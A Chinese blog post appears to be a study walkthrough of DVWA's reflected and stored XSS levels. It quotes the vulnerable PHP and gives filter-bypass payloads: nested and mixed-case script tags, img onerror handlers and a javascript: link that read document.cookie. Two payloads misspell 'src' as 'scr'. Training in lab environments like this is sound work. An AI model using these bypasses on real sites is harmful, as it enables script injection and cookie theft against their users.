DVWA之xss學習
自己的小小思路,有錯誤請指正
寫的是dvwa中的xss,反射型與儲存型,進行白盒測試
xss(Reflected)
關卡1:low
源碼
<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Feedback for end user
echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}
?>
這段代碼中的’name’直接輸出,并未進行過濾處理;是以我們直接使用JavaScript腳本代碼去測試一下
payload:
<script>alert(document.cookie)</script>
關卡2:medium
源碼
<?php
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Get input
$name = str_replace( '<script>', '', $_GET[ 'name' ] ); str_replace()函數替換字元串中的一些字元(區分大小寫)
// Feedback for end user
echo "<pre>Hello ${name}</pre>";
}
?>
這裡使用str_replace()函數對'name'中的<script>替換為空,但這隻過濾了一層<script>,且區分大小寫。
我們構造一段payload:
<scr<script>ipt>alert(document.cookie)</scr</script>ipt>
<scR<script>ipt>alert(document.cookie)</scr</script>Ipt>
<SCript>alert(document.cookie)</SCRIPT>
通過疊加标簽<script>、大小寫來繞過
關卡3:hight
源碼:
<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Get input
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );
//preg_replace 函數執行一個正規表達式的搜尋和替換。i是表示不區分大小寫
// Feedback for end user
echo "<pre>Hello ${name}</pre>";
}
?>
源碼中對’name’中進行了正規表達式,進行搜尋和替換,<script被過濾掉了,并不區分大小寫,但隻過濾了這些符号字母,卻沒有對事進行過略
這是通過事件來構造 payload:
<img src='!' onerror=alert(document.cookie)>
xss(Stored)
關卡1:low
源碼:
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] ); trim()函數:移除字元串兩側的空白字元或其他預定義字元
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input(清理資訊輸入)
$message = stripslashes( $message );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Sanitize name input
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
可以看出對有害輸入沒有任何過濾,直接将使用者送出的内容插入資料庫,輸入點在兩個輸入框都有
但name那裡的輸出框的長度隻有十,我們通過f12修改為較大的數字在進行插入我們的測試代碼
payload:
<a href='javascript:alert(document.cookie)'>
<script>prompt(document.cookie)</script>
關卡2:medium
源碼:
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = strip_tags( addslashes( $message ) );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$message = htmlspecialchars( $message );
// Sanitize name input
$name = str_replace( '<script>', '', $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
$message = strip_tags( addslashes( $message ) );
$message = htmlspecialchars( $message );
$name = str_replace( '<script>', '', $name );
對$message和$name中的字元串前後兩側的空白字元移除,對$message進行了傳回在預定的字元前添加反斜杠的字元串
還對$message進行預定義的字元裝換
這段代碼對$message做了一些過略和規則,但對$name隻過濾了<script>過濾,我們可以在firebug中對$name的長度修改
然後通過大小寫,疊加标簽的做法,插入測試代碼
payload:
<img scr='#' onerror=confirm(document.cookie)>
關卡3:high
源碼:
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = strip_tags( addslashes( $message ) );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$message = htmlspecialchars( $message );
// Sanitize name input
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
和關卡2:medium一樣的過略,但這裡吧$name中的标簽<script>進行細化過濾,并對大小寫過略,
payload:<img scr='#' onerror="confirm(/xss/)">
一起學習一起進步!
參考:
https://www.freebuf.com/articles/web/157953.html
時間:2019.5.7